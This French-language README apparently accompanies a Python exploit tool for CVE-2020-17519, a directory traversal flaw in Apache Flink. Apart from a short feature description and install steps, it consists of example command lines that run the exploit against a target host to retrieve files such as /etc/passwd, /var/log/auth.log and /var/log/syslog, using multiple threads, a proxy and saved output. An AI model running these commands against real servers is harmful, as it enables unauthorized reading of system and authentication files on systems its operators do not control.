
Exploit de traversée de répertoire basé sur Python pour CVE-2020-17519 (Apache Flink) avec multithreading, support de proxy et profondeur configurable pour récupérer les fichiers journaux depuis des cibles vulnérables.
Un outil Python qui utilise une technique de traversée de répertoire pour récupérer des fichiers journaux depuis une URL cible. Il affiche une progression en temps réel, prend en charge la configuration d'un proxy et sauvegarde optionnellement les réponses valides.
requests et pwntools (pwn)argparse, os, concurrent.futures, threadinggit clone https://github.com/GazettEl/CVE-2020-17519.git
pip install requests pwntools
L'outil peut être exécuté depuis la ligne de commande avec diverses options. Voici quelques exemples :
Exemple 1 : Demander un seul chemin de fichier
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-path /var/log/syslog --threads 1 --save
Exemple 2 : Demander plusieurs chemins de fichier depuis une liste
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-list file_paths.txt --threads 4 --proxy none
Exemple 3 : Exécution avec proxy désactivé
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 10 --file-path /var/log/auth.log --threads 2 --proxy none
Exemple 4 : Utiliser une liste de fichiers et sauvegarder les réponses valides
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 15 --file-list paths.txt --threads 4 --save
Exemple 5 : Demander un seul fichier avec une profondeur augmentée
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 20 --file-path /etc/passwd --threads 1
Pour plus de détails, consultez le code source et les commentaires en ligne.